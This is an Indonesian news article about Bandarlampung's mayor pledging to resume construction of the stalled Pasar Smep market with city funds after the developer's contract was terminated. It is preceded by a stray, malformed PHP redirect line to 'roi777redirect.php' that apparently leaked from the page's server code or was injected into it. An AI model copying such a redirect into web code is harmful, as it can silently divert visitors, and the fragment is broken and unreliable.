header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Walikota Bandarlampung Pastikan Pasar Smep Dilanjutkan -
Walikota Bandarlampung Pastikan Pasar Smep Dilanjutkan

TRANSLAMPUNG.COM, BANDARLAMPUNG – Walikota Bandarlampung, Herman HN memastikan pembangunan Pasar Smep yang sempat terhenti, akan segera dibangun kembali. Hal tersebut diungkapkan dia, pada Kamis (12/7).

Menurut dia, pemutusan kontrak terhadap pihak pengemban Pasar Smep merupakan sebagai langkah tegas dari Pemerintah Kota (Pemkot) Bandarlampung, yang menilai PT Prabu Artha wan prestasi.

“Nanti akan diambil alih sama Pemkot, Pembangunannya akan dimulai pada awal Januari 2019 nanti. Kita akan menggunakan dana APBD,” ujar dia.

Rencananya, kata dia, pembangunan Pasar Smep akan disesuaikan dengan rencana awal, yakni Baseman, Lantai I dan Lantai II.

Mengenai adanya dana yang masuk dari pedagang ke pihak pengembang yang lama, Herman HN meminta kepada pengembang yang lama untuk segera menyelesaikan kepada pedagang.

“Mudah-mudahan pembangunan Pasar Smep yang diagendakan tahun depan, bisa selesai sesuai dengan jadwal. Dan dapat dirasakan manfaatnya oleh masyarakat dan pedagang,” tutur dia.(jef/hkw)

News Reporter